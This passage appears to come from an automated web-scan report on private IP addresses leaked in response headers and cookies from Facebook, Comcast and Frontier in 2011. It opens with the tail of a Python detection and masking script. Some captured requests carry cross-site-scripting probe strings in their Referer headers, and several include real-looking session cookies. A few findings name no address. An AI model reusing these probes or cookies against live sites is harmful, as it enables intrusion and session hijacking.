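        return "node-" + tag
    return _IPV4_CANDIDATE.sub(repl, text)


# Constructed samples modelled on the report's findings (not captured traffic).
SAMPLE_HEADER = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/javascript;charset=utf-8\r\n"
    "X-FB-Server: 10.27.107.101\r\n"
    "Date: Tue, 06 Sep 2011 12:49:44 GMT\r\n"
    "\r\n"
    "fb_sharepro_render([{}])"
)
SAMPLE_COOKIE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; path=/\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "\r\n"
    "function getDocObj(elem,parent){}"
)
SAMPLE_BODY = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    '<a href="http://10.0.0.1">http://10.0.0.1</a> '
    '<a href="http://192.168.1.1">http://192.168.1.1</a> '
    "client 1.9.2.13 public 8.8.8.8 junk 999.1.1.1"
)

if __name__ == "__main__":
    for sample in (SAMPLE_HEADER, SAMPLE_COOKIE, SAMPLE_BODY):
        print(scan_response(sample))
    print(mask_private_ips(SAMPLE_COOKIE).split("\r\n")[1])
```

Running the script reports the address and its location for each sample, and prints the cookie line with the back-end address replaced by a tag. The keyed hash is the point of the design: a plain counter would break when nodes are added, and an unkeyed hash of a 10/8 address is brute-forceable in seconds, so the mapping has to be both stable and secret.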


19.1. http://api.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.107.101 (X-FB-Server response header)

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Tue, 06 Sep 2011 05:51:44 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.27.107.101
X-Cnection: close
Date: Tue, 06 Sep 2011 12:49:44 GMT
Content-Length: 425

fb_sharepro_render([{"url":"http:\/\/new.music.yahoo.com\/blogs\/live\/13348\/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video\/","normalized_url":"http:\/\/new.music.yahoo.com
...[SNIP]...

19.2. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.138.116 (X-FB-Server response header)

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "03dae24e377203ab54abd8eeddd80a35"
X-FB-Server: 10.27.138.116
X-Cnection: close
Content-Length: 133612
Cache-Control: public, max-age=1060
Expires: Tue, 06 Sep 2011 13:13:01 GMT
Date: Tue, 06 Sep 2011 12:55:21 GMT
Connection: close
Vary: Accept-Encoding

/*1315303860,169577076,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

19.3. http://customer.comcast.com/Pages/FAQDisplay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQDisplay.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.0.0.1
192.168.1.1
192.168.0.1

These appear as links in customer-facing FAQ content (the page is FAQDisplay.aspx and the addresses are the usual default gateway addresses of home routers), so this instance is almost certainly help text about the customer's own equipment rather than a leak of Comcast's internal infrastructure. Treat it as a false positive unless a separate source confirms these ranges are in use internally.

Request

GET /Pages/FAQDisplay.aspx?Guid=eb1cdc34-2fa3-4cf6-8b00-32f1e4e30feb HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.2.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B%20SC_LINKS%3D%3B

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 34622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Overl
...[SNIP]...
<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1<br />
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<a target="_blank" href="http://192.168.0.1 ">http://192.168.0.1 </a>
...[SNIP]...

19.4. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.102.52 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQDn8o3CVmyCPPAP&url=http%3A%2F%2Ffitv-episodes.s3.amazonaws.com%2Ffrontier%2Fgame_on%2Flafayette_jefferson_89x90.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.102.52
X-Cnection: close
Content-Length: 3692
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:44 GMT
Date: Tue, 06 Sep 2011 12:45:44 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.5. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.147.32 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQDlEXRAsBVA5vFU&url=http%3A%2F%2Fthumbnails.hulu.com%2F186%2F40035186%2F40035186_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.147.32
X-Cnection: close
Content-Length: 4886
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.6. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.47.44 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQAihlFIzrBbcHHG&url=http%3A%2F%2Fcache.thenewsroom.com%2Fktvi%2F2011%2F09%2F03%2F27cf8413-933b-4ed4-ab52-d0e227bd3660_preview.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.47.44
X-Cnection: close
Content-Length: 21082
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.7. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.188.64 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQCiVmH7SbfvZ6Zn&url=http%3A%2F%2Fthumbnails.hulu.com%2F213%2F50071213%2F185282_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.188.64
X-Cnection: close
Content-Length: 2576
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.8. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.18.44 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQD9mu08dehnlv7w&url=http%3A%2F%2Fcache.thenewsroom.com%2Fwreg%2F2011%2F08%2F30%2F825598fd-decb-4754-abd5-cebf604c73fe_preview.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.18.44
X-Cnection: close
Content-Length: 19904
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.9. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.209.33 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQCwDKcLl0sR3GsB&url=http%3A%2F%2Fpthumbnails.5min.com%2F10343096%2F517154781_3.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.209.33
X-Cnection: close
Content-Length: 3699
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.10. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.186.49 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQB1IeZSUlg5LPS1&url=http%3A%2F%2Fecx.images-amazon.com%2Fimages%2FI%2F41DhHbBd-HL._SX120_SY90_.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.186.49
X-Cnection: close
Content-Length: 1917
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.11. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.139.32 (X-FB-Server response header)

Request

GET /safe_image.php?d=AQBXZWprEKgvA9fN&url=http%3A%2F%2Fthumbnails.hulu.com%2F591%2F50118591%2F233441_120x90_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.139.32
X-Cnection: close
Content-Length: 2740
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:24 GMT
Date: Tue, 06 Sep 2011 12:45:24 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

19.12. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/docobj.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.160.118.20 (embedded in the value of the ARPT Set-Cookie header, which looks like a load-balancer persistence cookie that encodes the back-end server's address; this is the load-balancing case the remediation above describes, and the fix is to replace the address with an opaque identifier)

Request

GET /AgentOrdering/customAppTabInfo/docobj.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 669
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function getDocObj(elem,parent){
if(document.layers)
{
   if(parent){
       return "document."+parent+".document."+elem;
   }
   else{
       return "document."+elem;
   }
}
else if(document.all){
       return
...[SNIP]...

19.13. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabNavigation.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/customAppTabInfo/tabNavigation.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 4570
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

/* ********************************************************************************
CREATED 05/05 AXG987 per ER Rqst 10855

The file, tabNavigation.js, contains the JavaScript that makes the tab na
...[SNIP]...

19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabSetup.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/customAppTabInfo/tabSetup.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 2645
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

/* ********************************************************************************
CREATED 06/06 AXG987

*********************************************************************************** */


...[SNIP]...

19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/AgentOrdering.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/javascripts/AgentOrdering.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 339
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function AdvanceCursorByLengthChk(thisForm, presentObj, moveToName, maxLgth)
{
   if (presentObj.value.length == maxLgth)
   {
       setFocusToObj(thisForm, moveToName);
       return;
   }
}

function setF
...[SNIP]...

19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/validateinteger.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /AgentOrdering/javascripts/validateinteger.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 220
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

function Int_Function(theItem) {
   num_test = /\d/;
   for (i=0;i<theItem.value.length;i++) {
       if (!(num_test.test(theItem.value.charAt(i)))) {
           theItem.value = theItem.value.substring(0,i);
           r
...[SNIP]...

19.17. http://frontier.com/Controls/VirtualCode.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Controls/VirtualCode.ashx?pageid=73&origPath=%2ftopNav.css%2f HTTP/1.1
Host: frontier.com
